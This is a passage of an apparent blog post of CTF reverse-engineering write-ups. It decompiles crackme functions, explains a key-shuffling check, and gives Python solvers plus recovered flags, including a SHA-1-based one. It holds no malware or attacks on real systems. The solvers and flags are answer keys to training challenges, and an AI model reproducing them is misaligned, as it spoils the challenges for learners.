class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( v4 ) // after this loop ends, a1 = a1<span class="number">-1</span></span><br><span class="line"> {</span><br><span class="line"> ++v7;</span><br><span class="line"> ++*a1;</span><br><span class="line"> --v4;</span><br><span class="line"> --v6;</span><br><span class="line"> }</span><br><span class="line"> ++*a1;</span><br><span class="line"> *a1 = v8;</span><br><span class="line"> <span class="keyword">return</span> a1;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">int *__cdecl add_401000(int *a1, int a2)</span><br><span class="line">{</span><br><span class="line"> int v2; // edx</span><br><span class="line"> int v4; // [esp+Ch] [ebp<span class="number">-18</span>h]</span><br><span class="line"> int v5; // [esp+<span class="number">10</span>h] [ebp<span class="number">-14</span>h]</span><br><span class="line"> int v6; // [esp+<span class="number">18</span>h] [ebp-Ch]</span><br><span class="line"> signed int v7; // [esp+<span class="number">1</span>Ch] [ebp<span class="number">-8</span>h]</span><br><span class="line"></span><br><span class="line"> v5 = <span class="number">-1</span>;</span><br><span class="line"> v4 = <span class="number">-1</span> - a2 + <span class="number">1</span>;</span><br><span class="line"> v7 = <span class="number">1231</span>;</span><br><span class="line"> v2 = *a1;</span><br><span class="line"> v6 = a2 + <span class="number">1231</span>;</span><br><span class="line"> <span class="keyword">while</span> ( v4 ) // after the loop ends, a1 = a1 + a2</span><br><span class="line"> {</span><br><span class="line"> ++v7;</span><br><span class="line"> --*a1; // decremented -a2 times, i.e. -(-a2) = +a2</span><br><span class="line"> --v4;</span><br><span class="line"> --v6;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( v5 )</span><br><span class="line"> {</span><br><span class="line"> --v6;</span><br><span class="line"> ++*a1;</span><br><span class="line"> --v5;</span><br><span class="line"> }</span><br><span class="line"> ++*a1; // the loop above changed a1 by <span class="number">-1</span>; the +<span class="number">1</span> here restores the original value</span><br><span class="line"> <span class="keyword">return</span> a1;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">_DWORD *__cdecl sub_401220(_DWORD *a1, int a2)</span><br><span class="line">{</span><br><span class="line"> int v3; // [esp+<span class="number">8</span>h] [ebp<span class="number">-10</span>h]</span><br><span class="line"> signed int v4; // [esp+Ch] [ebp-Ch]</span><br><span class="line"> signed int v5; // [esp+<span class="number">14</span>h] [ebp<span class="number">-4</span>h]</span><br><span class="line"> int v6; // [esp+<span class="number">14</span>h] [ebp<span class="number">-4</span>h]</span><br><span class="line"></span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> v3 = <span class="number">-1</span> - a2 + <span class="number">1</span>;</span><br><span class="line"> v5 = <span class="number">-1</span>;</span><br><span class="line"> <span class="keyword">while</span> ( v3 ) // -a2</span><br><span class="line"> {</span><br><span class="line"> ++*a1; // after the loop ends, equivalent to a1 = a1 - a2</span><br><span class="line"> --v3;</span><br><span class="line"> --v5;</span><br><span class="line"> }</span><br><span class="line"> v6 = v5 * v5;</span><br><span class="line"> <span class="keyword">while</span> ( v4 ) // after this loop, a1 = a1<span class="number">-1</span></span><br><span class="line"> {</span><br><span class="line"> v6 *= <span class="number">123</span>;</span><br><span class="line"> ++*a1;</span><br><span class="line"> --v4;</span><br><span class="line"> }</span><br><span class="line"> ++*a1; // a1 += <span class="number">1</span>, restoring the value from before the previous loop</span><br><span class="line"> <span class="keyword">return</span> a1;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>WP</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">mul_401100</span><span class="params">(a,b)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> a*b</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sub_401220</span><span class="params">(a,b)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> a-b</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add_401000</span><span class="params">(a,b)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> a+b</span><br><span class="line">flag=[<span class="number">1</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>)]</span><br><span class="line">v121 = <span 
class="number">0</span></span><br><span class="line">print(<span class="string">"Your flag is:"</span>)</span><br><span class="line">v3 = mul_401100(flag[<span class="number">0</span>], <span class="number">0x3B9ACA00</span>)</span><br><span class="line">v4 = sub_401220(v3, <span class="number">0x3B9AC9CE</span>)</span><br><span class="line">flag[<span class="number">0</span>]=mul_401100(v4, <span class="number">2</span>)</span><br><span class="line">v5 = add_401000(flag[<span class="number">1</span>], <span class="number">0x4C4B40</span>)</span><br><span class="line">v6 = sub_401220(v5, <span class="number">0x65B9AA</span>)</span><br><span class="line">v7 = add_401000(v6, <span class="number">1666666</span>)</span><br><span class="line">v8 = add_401000(v7, <span class="number">45</span>)</span><br><span class="line">v9 = mul_401100(v8, <span class="number">2</span>)</span><br><span class="line">flag[<span class="number">1</span>]=add_401000(v9, <span class="number">5</span>)</span><br><span class="line">v10 = mul_401100(flag[<span class="number">2</span>], <span class="number">0x3B9ACA00</span>)</span><br><span class="line">v11 = sub_401220(v10, <span class="number">999999950</span>)</span><br><span class="line">v12 = mul_401100(v11, <span class="number">2</span>)</span><br><span class="line">flag[<span class="number">2</span>]=add_401000(v12, <span class="number">2</span>)</span><br><span class="line">v13 = add_401000(flag[<span class="number">3</span>], <span class="number">55</span>)</span><br><span class="line">v14 = sub_401220(v13, <span class="number">3</span>)</span><br><span class="line">v15 = add_401000(v14, <span class="number">4</span>)</span><br><span class="line">flag[<span class="number">3</span>]=sub_401220(v15, <span class="number">1</span>)</span><br><span class="line">v16 = mul_401100(flag[<span class="number">4</span>], <span class="number">100000000</span>)</span><br><span class="line">v17 = sub_401220(v16, <span 
class="number">99999950</span>)</span><br><span class="line">v18 = mul_401100(v17, <span class="number">2</span>)</span><br><span class="line">flag[<span class="number">4</span>]=add_401000(v18, <span class="number">2</span>)</span><br><span class="line">v19 = sub_401220(flag[<span class="number">5</span>], <span class="number">1</span>)</span><br><span class="line">v20 = mul_401100(v19, <span class="number">1000000000</span>)</span><br><span class="line">v21 = add_401000(v20, <span class="number">55</span>)</span><br><span class="line">flag[<span class="number">5</span>]=sub_401220(v21, <span class="number">3</span>)</span><br><span class="line">v22 = mul_401100(flag[<span class="number">6</span>], <span class="number">1000000</span>)</span><br><span class="line">v23 = sub_401220(v22, <span class="number">999975</span>)</span><br><span class="line">flag[<span class="number">6</span>]=mul_401100(v23, <span class="number">4</span>)</span><br><span class="line">v24 = add_401000(flag[<span class="number">7</span>], <span class="number">55</span>)</span><br><span class="line">v25 = sub_401220(v24, <span class="number">33</span>)</span><br><span class="line">v26 = add_401000(v25, <span class="number">44</span>)</span><br><span class="line">flag[<span class="number">7</span>]=sub_401220(v26, <span class="number">11</span>)</span><br><span class="line">v27 = mul_401100(flag[<span class="number">8</span>], <span class="number">10</span>)</span><br><span class="line">v28 = sub_401220(v27, <span class="number">5</span>)</span><br><span class="line">v29 = mul_401100(v28, <span class="number">8</span>)</span><br><span class="line">flag[<span class="number">8</span>]=add_401000(v29, <span class="number">9</span>)</span><br><span class="line">v30 = add_401000(flag[<span class="number">9</span>], <span class="number">0</span>)</span><br><span class="line">v31 = sub_401220(v30, <span class="number">0</span>)</span><br><span class="line">v32 = add_401000(v31, <span 
class="number">11</span>)</span><br><span class="line">v33 = sub_401220(v32, <span class="number">11</span>)</span><br><span class="line">flag[<span class="number">9</span>]=add_401000(v33, <span class="number">53</span>)</span><br><span class="line">v34 = add_401000(flag[<span class="number">10</span>], <span class="number">49</span>)</span><br><span class="line">v35 = sub_401220(v34, <span class="number">2</span>)</span><br><span class="line">v36 = add_401000(v35, <span class="number">4</span>)</span><br><span class="line">flag[<span class="number">10</span>]=sub_401220(v36, <span class="number">2</span>)</span><br><span class="line">v37 = mul_401100(flag[<span class="number">11</span>], <span class="number">1000000</span>)</span><br><span class="line">v38 = sub_401220(v37, <span class="number">999999</span>)</span><br><span class="line">v39 = mul_401100(v38, <span class="number">4</span>)</span><br><span class="line">flag[<span class="number">11</span>]=add_401000(v39, <span class="number">50</span>)</span><br><span class="line">v40 = add_401000(flag[<span class="number">12</span>], <span class="number">1</span>)</span><br><span class="line">v41 = add_401000(v40, <span class="number">1</span>)</span><br><span class="line">v42 = add_401000(v41, <span class="number">1</span>)</span><br><span class="line">v43 = add_401000(v42, <span class="number">1</span>)</span><br><span class="line">v44 = add_401000(v43, <span class="number">1</span>)</span><br><span class="line">v45 = add_401000(v44, <span class="number">1</span>)</span><br><span class="line">v46 = add_401000(v45, <span class="number">10</span>)</span><br><span class="line">flag[<span class="number">12</span>]=add_401000(v46, <span class="number">32</span>)</span><br><span class="line">v47 = mul_401100(flag[<span class="number">13</span>], <span class="number">10</span>)</span><br><span class="line">v48 = sub_401220(v47, <span class="number">5</span>)</span><br><span class="line">v49 = mul_401100(v48, <span 
class="number">8</span>)</span><br><span class="line">v50 = add_401000(v49, <span class="number">9</span>)</span><br><span class="line">flag[<span class="number">13</span>]=add_401000(v50, <span class="number">48</span>)</span><br><span class="line">v51 = sub_401220(flag[<span class="number">14</span>], <span class="number">1</span>)</span><br><span class="line">v52 = mul_401100(v51, <span class="number">-294967296</span>)</span><br><span class="line">v53 = add_401000(v52, <span class="number">55</span>)</span><br><span class="line">flag[<span class="number">14</span>]=sub_401220(v53, <span class="number">3</span>)</span><br><span class="line">v54 = add_401000(flag[<span class="number">15</span>], <span class="number">1</span>)</span><br><span class="line">v55 = add_401000(v54, <span class="number">2</span>)</span><br><span class="line">v56 = add_401000(v55, <span class="number">3</span>)</span><br><span class="line">v57 = add_401000(v56, <span class="number">4</span>)</span><br><span class="line">v58 = add_401000(v57, <span class="number">5</span>)</span><br><span class="line">v59 = add_401000(v58, <span class="number">6</span>)</span><br><span class="line">v60 = add_401000(v59, <span class="number">7</span>)</span><br><span class="line">flag[<span class="number">15</span>]=add_401000(v60, <span class="number">20</span>)</span><br><span class="line">v61 = mul_401100(flag[<span class="number">16</span>], <span class="number">10</span>)</span><br><span class="line">v62 = sub_401220(v61, <span class="number">5</span>)</span><br><span class="line">v63 = mul_401100(v62, <span class="number">8</span>)</span><br><span class="line">v64 = add_401000(v63, <span class="number">9</span>)</span><br><span class="line">flag[<span class="number">16</span>]=add_401000(v64, <span class="number">48</span>)</span><br><span class="line">v65 = add_401000(flag[<span class="number">17</span>], <span class="number">7</span>)</span><br><span class="line">v66 = add_401000(v65, <span 
class="number">6</span>)</span><br><span class="line">v67 = add_401000(v66, <span class="number">5</span>)</span><br><span class="line">v68 = add_401000(v67, <span class="number">4</span>)</span><br><span class="line">v69 = add_401000(v68, <span class="number">3</span>)</span><br><span class="line">v70 = add_401000(v69, <span class="number">2</span>)</span><br><span class="line">v71 = add_401000(v70, <span class="number">1</span>)</span><br><span class="line">flag[<span class="number">17</span>]=add_401000(v71, <span class="number">20</span>)</span><br><span class="line">v72 = add_401000(flag[<span class="number">18</span>], <span class="number">7</span>)</span><br><span class="line">v73 = add_401000(v72, <span class="number">2</span>)</span><br><span class="line">v74 = add_401000(v73, <span class="number">4</span>)</span><br><span class="line">v75 = add_401000(v74, <span class="number">3</span>)</span><br><span class="line">v76 = add_401000(v75, <span class="number">6</span>)</span><br><span class="line">v77 = add_401000(v76, <span class="number">5</span>)</span><br><span class="line">v78 = add_401000(v77, <span class="number">1</span>)</span><br><span class="line">flag[<span class="number">18</span>]=add_401000(v78, <span class="number">20</span>)</span><br><span class="line">v79 = mul_401100(flag[<span class="number">19</span>], <span class="number">1000000</span>)</span><br><span class="line">v80 = sub_401220(v79, <span class="number">999999</span>)</span><br><span class="line">v81 = mul_401100(v80, <span class="number">4</span>)</span><br><span class="line">v82 = add_401000(v81, <span class="number">50</span>)</span><br><span class="line">flag[<span class="number">19</span>]=sub_401220(v82, <span class="number">1</span>)</span><br><span class="line">v83 = sub_401220(flag[<span class="number">20</span>], <span class="number">1</span>)</span><br><span class="line">v84 = mul_401100(v83, <span class="number">-294967296</span>)</span><br><span class="line">v85 = 
add_401000(v84, <span class="number">49</span>)</span><br><span class="line">flag[<span class="number">20</span>]=sub_401220(v85, <span class="number">1</span>)</span><br><span class="line">v86 = sub_401220(flag[<span class="number">21</span>], <span class="number">1</span>)</span><br><span class="line">v87 = mul_401100(v86, <span class="number">1000000000</span>)</span><br><span class="line">v88 = add_401000(v87, <span class="number">54</span>)</span><br><span class="line">v89 = sub_401220(v88, <span class="number">1</span>)</span><br><span class="line">v90 = add_401000(v89, <span class="number">1000000000</span>)</span><br><span class="line">flag[<span class="number">21</span>]=sub_401220(v90, <span class="number">1000000000</span>)</span><br><span class="line">v91 = add_401000(flag[<span class="number">22</span>], <span class="number">49</span>)</span><br><span class="line">v92 = sub_401220(v91, <span class="number">1</span>)</span><br><span class="line">v93 = add_401000(v92, <span class="number">2</span>)</span><br><span class="line">flag[<span class="number">22</span>]=sub_401220(v93, <span class="number">1</span>)</span><br><span class="line">v94 = mul_401100(flag[<span class="number">23</span>], <span class="number">10</span>)</span><br><span class="line">v95 = sub_401220(v94, <span class="number">5</span>)</span><br><span class="line">v96 = mul_401100(v95, <span class="number">8</span>)</span><br><span class="line">v97 = add_401000(v96, <span class="number">9</span>)</span><br><span class="line">flag[<span class="number">23</span>]=add_401000(v97, <span class="number">48</span>)</span><br><span class="line">v98 = add_401000(flag[<span class="number">24</span>], <span class="number">1</span>)</span><br><span class="line">v99 = add_401000(v98, <span class="number">3</span>)</span><br><span class="line">v100 = add_401000(v99, <span class="number">3</span>)</span><br><span class="line">v101 = add_401000(v100, <span class="number">3</span>)</span><br><span 
class="line">v102 = add_401000(v101, <span class="number">6</span>)</span><br><span class="line">v103 = add_401000(v102, <span class="number">6</span>)</span><br><span class="line">v104 = add_401000(v103, <span class="number">6</span>)</span><br><span class="line">flag[<span class="number">24</span>]=add_401000(v104, <span class="number">20</span>)</span><br><span class="line">v105 = add_401000(flag[<span class="number">25</span>], <span class="number">55</span>)</span><br><span class="line">v106 = sub_401220(v105, <span class="number">33</span>)</span><br><span class="line">v107 = add_401000(v106, <span class="number">44</span>)</span><br><span class="line">v108 = sub_401220(v107, <span class="number">11</span>)</span><br><span class="line">flag[<span class="number">25</span>]=add_401000(v108, <span class="number">42</span>)</span><br><span class="line">flag[<span class="number">26</span>]=add_401000(flag[<span class="number">26</span>], flag[<span class="number">25</span>])</span><br><span class="line">flag[<span class="number">27</span>]=add_401000(flag[<span class="number">27</span>], flag[<span class="number">12</span>])</span><br><span class="line">v109 = flag[<span class="number">27</span>]</span><br><span class="line">v110 = sub_401220(flag[<span class="number">28</span>], <span class="number">1</span>)</span><br><span class="line">v111 = add_401000(v110, v109)</span><br><span class="line">flag[<span class="number">28</span>]=sub_401220(v111, <span class="number">1</span>)</span><br><span class="line">v112 = flag[<span class="number">23</span>]</span><br><span class="line">v113 = sub_401220(flag[<span class="number">29</span>], <span class="number">1</span>)</span><br><span class="line">v114 = mul_401100(v113, <span class="number">1000000</span>)</span><br><span class="line">flag[<span class="number">29</span>]=add_401000(v114, v112)</span><br><span class="line">v115 = flag[<span class="number">27</span>]</span><br><span class="line">v116 = 
add_401000(flag[<span class="number">30</span>], <span class="number">1</span>)</span><br><span class="line">flag[<span class="number">30</span>]=mul_401100(v116, v115)</span><br><span class="line">flag[<span class="number">31</span>]=add_401000(flag[<span class="number">31</span>], flag[<span class="number">30</span>])</span><br><span class="line">print(<span class="string">"CTF{"</span>+<span class="string">''</span>.join(map(chr,flag))+<span class="string">"}"</span>)</span><br></pre></td></tr></table></figure></div><h3 id="re1-100"><a href="#re1-100" class="headerlink" title="re1-100"></a>re1-100</h3><p>Surprisingly, this one was placed in the expert section. The main routine runs the input through the following chain of checks:</p>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ( numRead )</span><br><span class="line">{</span><br><span class="line">  <span class="keyword">if</span> ( childCheckDebugResult() )</span><br><span class="line">  {</span><br><span class="line">    responseFalse();</span><br><span class="line">  }</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( bufParentRead[<span class="number">0</span>] == <span class="string">'{'</span> ) <span class="comment">// first character</span></span><br><span class="line">  {</span><br><span class="line">    <span class="keyword">if</span> ( strlen(bufParentRead) == <span class="number">42</span> ) <span class="comment">// the input must be 42 characters long</span></span><br><span class="line">    {</span><br><span class="line">      <span class="keyword">if</span> ( !strncmp(&bufParentRead[<span class="number">1</span>], <span class="string">"53fc275d81"</span>, <span class="number">0xA</span>uLL) ) <span class="comment">// input positions 1-10 (the 2nd to 11th characters)</span></span><br><span class="line">      {</span><br><span class="line">        <span class="keyword">if</span> ( bufParentRead[strlen(bufParentRead) - <span class="number">1</span>] == <span class="string">'}'</span> ) <span class="comment">// last character</span></span><br><span class="line">        {</span><br><span class="line">          <span class="keyword">if</span> ( !strncmp(&bufParentRead[<span class="number">31</span>], <span class="string">"4938ae4efd"</span>, <span class="number">0xA</span>uLL) ) <span class="comment">// input positions 31-40</span></span><br><span class="line">          {</span><br><span class="line">            <span class="keyword">if</span> ( !confuseKey(bufParentRead, <span class="number">42</span>) ) <span class="comment">// the key function</span></span><br><span class="line">            {</span><br><span class="line">              responseFalse();</span><br><span class="line">            }</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span> ( !strncmp(bufParentRead, <span class="string">"{daf29f59034938ae4efd53fc275d81053ed5be8c}"</span>, <span class="number">0x2A</span>uLL) ) <span class="comment">// compare the rearranged buffer against the constant</span></span><br><span class="line">            {</span><br><span class="line">              responseTrue(); <span class="comment">// {53fc275d81053ed5be8cdaf29f59034938ae4efd}</span></span><br><span class="line">            }</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            {</span><br><span class="line">              responseFalse();</span><br></pre></td></tr></table></figure></div>
<p>The main thing to analyze is the <code>confuseKey(bufParentRead, 42)</code> function.</p>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">bool __cdecl confuseKey(char *szKey, int iKeyLength)</span><br><span class="line">{</span><br><span class="line">  char szPart1[<span class="number">15</span>]; <span class="comment">// [rsp+10h] [rbp-50h]</span></span><br><span class="line">  char szPart2[<span class="number">15</span>]; <span class="comment">// [rsp+20h] [rbp-40h]</span></span><br><span class="line">  char szPart3[<span class="number">15</span>]; <span class="comment">// [rsp+30h] [rbp-30h]</span></span><br><span class="line">  char szPart4[<span class="number">15</span>]; <span class="comment">// [rsp+40h] [rbp-20h]</span></span><br><span class="line">  unsigned __int64 v7; <span class="comment">// [rsp+58h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v7 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  *(_QWORD *)szPart1 = <span class="number">0LL</span>;</span><br><span class="line">  *(_DWORD *)&szPart1[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line">  *(_WORD *)&szPart1[<span class="number">12</span>] = <span class="number">0</span>;</span><br><span class="line">  szPart1[<span class="number">14</span>] = <span class="number">0</span>;</span><br><span class="line">  *(_QWORD *)szPart2 = <span class="number">0LL</span>;</span><br><span class="line">  *(_DWORD *)&szPart2[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line">  *(_WORD *)&szPart2[<span class="number">12</span>] = <span class="number">0</span>;</span><br><span class="line">  szPart2[<span class="number">14</span>] = <span class="number">0</span>;</span><br><span class="line">  *(_QWORD *)szPart3 = <span class="number">0LL</span>;</span><br><span class="line">  *(_DWORD *)&szPart3[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line">  *(_WORD *)&szPart3[<span class="number">12</span>] = <span class="number">0</span>;</span><br><span class="line">  szPart3[<span class="number">14</span>] = <span class="number">0</span>;</span><br><span class="line">  *(_QWORD *)szPart4 = <span class="number">0LL</span>;</span><br><span class="line">  *(_DWORD *)&szPart4[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line">  *(_WORD *)&szPart4[<span class="number">12</span>] = <span class="number">0</span>;</span><br><span class="line">  szPart4[<span class="number">14</span>] = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> ( iKeyLength != <span class="number">42</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> ( !szKey )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> ( strlen(szKey) != <span class="number">42</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> ( *szKey != <span class="number">123</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">  strncpy(szPart1, szKey + <span class="number">1</span>, <span class="number">0xA</span>uLL); <span class="comment">// split the input, minus the surrounding {}, into 4 parts</span></span><br><span class="line">  strncpy(szPart2, szKey + <span class="number">11</span>, <span class="number">0xA</span>uLL);</span><br><span class="line">  strncpy(szPart3, szKey + <span class="number">21</span>, <span class="number">0xA</span>uLL);</span><br><span class="line">  strncpy(szPart4, szKey + <span class="number">31</span>, <span class="number">0xA</span>uLL);</span><br><span class="line">  memset(szKey, <span class="number">0</span>, iKeyLength);</span><br><span class="line">  *szKey = <span class="string">'{'</span>;</span><br><span class="line">  strcat(szKey, szPart3); <span class="comment">// reassemble the parts in the order 3,4,1,2</span></span><br><span class="line">  strcat(szKey, szPart4);</span><br><span class="line">  strcat(szKey, szPart1);</span><br><span class="line">  strcat(szKey, szPart2);</span><br><span class="line">  szKey[<span class="number">41</span>] = <span class="string">'}'</span>;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div>
<p>exp</p>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">s1=<span class="string">'53fc275d81'</span>  <span class="comment"># known part 1 (positions 1-10), from the strncmp check</span></span><br><span class="line">s4=<span class="string">'4938ae4efd'</span>  <span class="comment"># known part 4 (positions 31-40)</span></span><br><span class="line"><span class="comment"># confuseKey reorders the four parts as 3,4,1,2</span></span><br><span class="line">ss=<span class="string">'daf29f59034938ae4efd53fc275d81053ed5be8c'</span></span><br><span class="line">x=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(ss),<span class="number">10</span>):</span><br><span class="line">    x.append(ss[i:i+<span class="number">10</span>])</span><br><span class="line">print(x)</span><br><span class="line">print(<span class="string">'{'</span>,<span class="string">''</span>.join((x[<span class="number">2</span>],x[<span class="number">3</span>],x[<span class="number">0</span>],x[<span class="number">1</span>])),<span class="string">'}'</span>,sep=<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ['daf29f5903', '4938ae4efd', '53fc275d81', '053ed5be8c']</span></span><br><span class="line"><span class="comment"># 
{53fc275d81053ed5be8cdaf29f59034938ae4efd}</span></span><br></pre></td></tr></table></figure></div><h3 id="answer-to-everything"><a href="#answer-to-everything" class="headerlink" title="answer_to_everything"></a>answer_to_everything</h3><p>Open main.exe:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/ZgdqkAlDfn6BzaU.png" alt="image-20201124165527869" title=""> </div> <div class="image-caption">image-20201124165527869</div> </figure><p>Check for a packer:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/WGXUNMlDhTC7Ize.png" alt="image-20201124165540233" title=""> </div> <div class="image-caption">image-20201124165540233</div> </figure><p>It is not a valid PE file, so it is not a Windows program; the guess is Linux.</p><p>Drag main.exe into IDA 32:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/jeGKvH38PM9Rstk.png" alt="image-20201124165553289" title=""> </div> <div class="image-caption">image-20201124165553289</div> </figure><p>This reports "ELF64 for x86-64". ELF means a program that runs under Linux, and 64 means IDA 32 cannot analyze this program; IDA 64 is needed.</p><p>So now move it into Linux (Ubuntu 64).</p><p>Open a terminal.</p><p>Then check the permissions of main.exe with <code>ls -a main.exe</code>, which shows the following.</p><p><code>chmod a+x main.exe</code> // make it executable // run this command if the permissions are insufficient; afterwards <code>-rwxrwxrwx</code> shows that main.exe can now be executed.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/DyRfGWwqYSgT5r8.png" alt="000000" title=""> </div> <div class="image-caption">000000</div> </figure><p>Then run <code>./main.exe</code>.</p><p>It prints:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/7lMsi9b5hAkImaY.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Then type something arbitrary.</p><p>It responds YOUSUCK. So the guess is: the program first prints a line, Gimme, then reads input; if the input is wrong it prints YOUSUCK, and if it is right it prints the information we want.</p><p>Next, load main.exe into IDA 64 and look for the key string Gimme // there are very few strings, so it is visible directly and no search is needed.</p><figure 
class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="C:\Users\大仑子\AppData\Roaming\Typora\typora-user-images\image-20201124165640832.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Double-click to jump to the corresponding code, where we see:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/gCFncUVdo5TWH9l.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Then press the X key to see which places reference it. Press X:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/CU3whqfL6gejQJr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Clicking through leads to a function<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/Yw7mEX3rq2P1WjF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure></p><p>Press Tab to switch to the disassembly view:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/DixtsoMBdc6PXKG.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Now it is clear: in Linux we should enter 42.</p><p>It then prints Cipher from Bill \nSubmit without any tags\n#kdudpeh. The guess was that kdudpeh is the flag we want, but ISCC{kdudpeh} was rejected. Looking at the challenge, I noticed the mention of sha1 and first thought it was a SHA-1 collision; it turned out to be SHA-1 hashing, and the flag is <code>flag{80ee2a3fe31da904c596d993f7f1de4827c1450a}</code></p>]]></content>
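Added example, not part of the original writeup: a Python model of the re1-100 check chain above, so the recovered input can be confirmed by running it forward through the program's own logic instead of only reasoning backwards from the constant. The names confuse_key, check_input, recover_input and split_parts are my own; the constants are the ones in the decompiled code.

```python
# Added example (not from the original writeup): a model of the re1-100
# check chain. The forward transform mirrors confuseKey(); the inverse
# recovers the accepted input, and the forward model confirms it.
from typing import List, Optional

PART = 10                      # each of the four blocks is 10 characters
KEY_LEN = 42                   # '{' + 40 characters + '}'
PREFIX = "53fc275d81"          # strncmp(bufParentRead + 1, ..., 0xA)
SUFFIX = "4938ae4efd"          # strncmp(bufParentRead + 31, ..., 0xA)
TARGET = "{daf29f59034938ae4efd53fc275d81053ed5be8c}"
# confuseKey() rebuilds the buffer as '{' + part3 + part4 + part1 + part2 + '}'
ORDER = (2, 3, 0, 1)


def split_parts(inner: str) -> List[str]:
    """Cut the 40 inner characters into four 10-character parts."""
    return [inner[i:i + PART] for i in range(0, len(inner), PART)]


def confuse_key(key: str) -> Optional[str]:
    """Forward model of confuseKey(). Returns None where the C function
    returns 0 (wrong length or missing leading brace)."""
    if len(key) != KEY_LEN or key[0] != "{":
        return None
    parts = split_parts(key[1:KEY_LEN - 1])
    return "{" + "".join(parts[i] for i in ORDER) + "}"


def check_input(buf: str) -> bool:
    """Mirror of the main routine's checks, in the same order."""
    if not buf or buf[0] != "{":
        return False
    if len(buf) != KEY_LEN:
        return False
    if buf[1:1 + PART] != PREFIX:
        return False
    if buf[-1] != "}":
        return False
    if buf[31:31 + PART] != SUFFIX:
        return False
    confused = confuse_key(buf)
    return confused is not None and confused == TARGET


def recover_input(target: str = TARGET) -> str:
    """Invert the permutation: output part j holds input part ORDER[j],
    so input part ORDER[j] is output part j. Works for any ORDER."""
    out_parts = split_parts(target[1:KEY_LEN - 1])
    in_parts = [""] * len(ORDER)
    for j, src in enumerate(ORDER):
        in_parts[src] = out_parts[j]
    return "{" + "".join(in_parts) + "}"


if __name__ == "__main__":
    candidate = recover_input()
    print(candidate, "accepted" if check_input(candidate) else "rejected")
```

recover_input derives the inverse from ORDER rather than hard-coding the 3,4,1,2 shuffle, so the same code handles any other permutation of the four parts; check_input then replays every test from the decompiled main routine, which is the step the writeup's exp leaves to the remote service.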
<summary type="html">
